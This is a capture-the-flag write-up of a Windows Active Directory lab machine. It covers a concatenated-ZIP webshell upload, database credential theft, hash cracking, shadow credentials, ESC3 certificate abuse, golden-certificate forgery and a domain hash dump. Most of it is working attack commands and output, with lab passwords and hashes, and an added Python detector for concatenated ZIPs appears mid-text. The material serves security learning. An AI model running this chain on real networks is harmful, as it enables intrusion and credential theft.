Basic information

Port scan

Port 80 plus the usual Windows domain ports:

```
$ nmap -sC -sV -Pn 10.10.11.71
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 14:53 JST
Nmap scan report for 10.10.11.71
Host is up (0.18s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-02 13:34:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-06-02T13:35:28+00:00; +7h38m36s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T13:35:29+00:00; +7h38m36s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-06-02T13:35:28+00:00; +7h38m36s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T13:35:29+00:00; +7h38m36s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h38m35s, deviation: 0s, median: 7h38m35s
| smb2-time:
| date: 2025-06-02T13:34:52
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.78 seconds
```

80

A hosts entry is needed:

```
10.10.11.71 certificate.htb dc01.certificate.htb
```

An online-education site:

Certificate

Register any student account and log in (there is also a teacher account option, but that registration needs admin approval; normally that would point to XSS, but not on this box).

course

Join any course; in the quiz you can upload files:

uploads

It says only specified file types are accepted, and testing shows that zip files are automatically extracted, the types of the files inside are checked, and the file contents are subject to a MIME type check:

ZIP Concatenation

A search turns up the ZIP Concatenation technique: a legitimate zip followed by a malicious zip, uploaded to get a shell:

```
zip miao.zip miao.pdf

mkdir shell
cd shell
nano shell.php

zip -r shell.zip shell/

cat miao.zip shell.zip > miaomiao.zip
```
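A server-side check for the concatenated-archive trick above, as an added example (not the writeup's or the target application's code): it flags an upload that carries more than one ZIP archive, which is exactly what a validator that only inspects the entries listed by the last central directory misses. The sample archives are constructed in the block.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # End-of-Central-Directory record signature


def find_eocd_records(data: bytes) -> list[int]:
    """Return the offset of every EOCD signature in the blob."""
    offsets, pos = [], data.find(EOCD_SIG)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(EOCD_SIG, pos + 1)
    return offsets


def is_concatenated_zip(data: bytes) -> bool:
    """True if the blob holds more than one ZIP archive.

    Two signals: more than one EOCD record, or a central-directory offset in
    the last EOCD that does not match where the central directory really
    starts (readers such as Python's zipfile silently compensate for this).
    """
    eocds = find_eocd_records(data)
    if len(eocds) != 1:
        return True
    # EOCD: sig(4) disk(2) cd_disk(2) n_this(2) n_total(2) cd_size(4) cd_offset(4)
    cd_size, cd_offset = struct.unpack_from("<II", data, eocds[0] + 12)
    return eocds[0] - cd_size != cd_offset


def listed_entries(data: bytes) -> list[str]:
    """What a validator that trusts the last central directory would see."""
    return zipfile.ZipFile(io.BytesIO(data)).namelist()


def build_zip(files: dict[str, bytes]) -> bytes:
    """Constructed sample archive (stored, so no stray signatures inside)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    benign = build_zip({"miao.pdf": b"%PDF-1.4 constructed sample"})
    second = build_zip({"shell/shell.php": b"<?php echo 'placeholder'; ?>"})
    combined = benign + second   # same effect as: cat miao.zip shell.zip > miaomiao.zip
    print("benign flagged:  ", is_concatenated_zip(benign))    # False
    print("combined flagged:", is_concatenated_zip(combined))  # True
    print("zipfile lists:   ", listed_entries(combined))       # ['shell/shell.php']
```

Rejecting the upload when `is_concatenated_zip` returns True, before any extraction, closes the gap between what the type check sees and what the extractor writes to disk.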

Then change the file path to the actual shell path and visit it to get a shell as xamppuser:

```
http://certificate.htb/static/uploads/07745dfb2ce97f9e6c558552ee78ef6d/shell/shell.php
```

mysql

db.php

Routine file browsing yields the database password:

```
PS C:\xampp\htdocs\certificate.htb> cat db.php

$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
```

mysql

Next, pull information from the database, which gives a few hashes to crack:

```
# PS C:\xampp\mysql\bin>
.\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e "SHOW TABLES;"

.\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e "desc users;"

.\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e "select username,email,password from users;"

Lorra.AAA lorra.aaa@certificate.htb $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
Sara1200 sara1200@gmail.com $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
Johney johny009@mail.com $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww havokww@hotmail.com $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
stev steven@yahoo.com $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b sara.b@certificate.htb $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6

# sara.b's password can be cracked
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Blink182
```

sara.b to lion.sk

Log in as sara.b; this is not user yet, so run bloodhound while at it:

```
evil-winrm -i 10.10.11.71 -u sara.b -p 'Blink182'

bloodhound-python -u sara.b -p 'Blink182' -d 'certificate.htb' -ns 10.10.11.71 --zip -c All -dc 'dc01.certificate.htb'
```

WS-01

Sara.B's Documents folder contains a WS-01 directory with a pcap file; its description says it holds valid authentication information, so download it locally and extract:

This part is similar to the earlier Office box: extract the data, fix up the format, and crack:

```
tshark -r ./WS-01_PktMon.pcap -Y "kerberos.msg_type == 10 && kerberos.cipher && kerberos.realm && kerberos.CNameString" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher -E separator=$

Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

sudo hashcat -m 19900 hash.txt ~/Tools/dict/rockyou.txt

!QAZ2wsx
```

Unintended path to lion.sk & ryan.k

sara.b is a member of the Account Operators group and has GenericAll over other groups:

So shadow credentials work directly (changing the password would also work, which is why the hash obtained here may be one that someone else has already changed):

```
faketime "$(curl -sik http://10.10.11.71:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

certipy shadow auto -username 'sara.b@certificate.htb' -password 'Blink182' -account 'lion.sk' -target 'certificate.htb' -dc-ip 10.10.11.71

[*] NT hash for 'Lion.SK': 3b24c391862f4a8531a245a0217708c4
```

Likewise, the same unintended path jumps straight to ryan.k:

```
certipy shadow auto -username 'sara.b@certificate.htb' -password 'Blink182' -account 'ryan.k' -target 'certificate.htb' -dc-ip 10.10.11.71

[*] NT hash for 'Ryan.K': b1bc3d70e70f4f36b1509a65ae1a2ae6
```

user flag

Log in as lion.sk:

```
evil-winrm -i 10.10.11.71 -u lion.sk -p '!QAZ2wsx'
```

ESC3 to ryan.k

Going by the description of the group lion.sk belongs to, look at the certificate side; a routine certipy run reveals ESC3:

```
certipy find -u lion.sk -p '!QAZ2wsx' -target certificate.htb -stdout -vulnerable

certipy find -u lion.sk -p '!QAZ2wsx' -target certificate.htb -stdout

Template Name Delegated-CRA
Enrollment Agent : True

Template Name : SignedUser

[*] Remarks
ESC3 Target Template : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template requires a signature with the Certificate Request Agent application policy.
```

Follow the wiki step by step:

The target user is ryan.k, since it is a member of DOMAIN STORAGE MANAGERS.

```
certipy req -u lion.sk -p '!QAZ2wsx' -dc-ip 10.10.11.71 -target dc01.certificate.htb -ca Certificate-LTD-CA -template Delegated-CRA

certipy req -u lion.sk -p '!QAZ2wsx' -dc-ip 10.10.11.71 -target dc01.certificate.htb -ca Certificate-LTD-CA -template SignedUser -pfx lion.sk.pfx -on-behalf-of 'CERTIFICATE\RYAN.K'

certipy auth -pfx ryan.k.pfx -dc-ip 10.10.11.71

[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6
```

ryan.k & SeManageVolumePrivilege

Log in as ryan.k; SeManageVolumePrivilege is present:

```
evil-winrm -i 10.10.11.71 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6
```

A search turns up:

According to its description, running it grants us full access to the C: drive; we can then enter the Administrator directory, but still cannot read root.txt directly:

```
C:\Users\Ryan.K\Documents\SeManageVolumeExploit.exe
```

certutil

But we can export the CA root certificate:

```
certutil -store ca
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Template: CA, Root Certification Authority

certutil -exportPFX ca 75b2f4bbf31f108945147b466131bdca .\certificate.pfx
download certificate.pfx
```

Golden Certificates to root

With the root certificate in hand, the rest is a Golden Certificate:

```
certipy forge -ca-pfx certificate.pfx -upn Administrator@certificate.htb -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB'

certipy auth -pfx administrator_forged.pfx -dc-ip 10.10.11.71

[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6
```

hashdump

```
impacket-secretsdump Administrator@10.10.11.71 -hashes :d804304519bf0143c14cbf1c024408c6 -just-dc-ntlm
```

References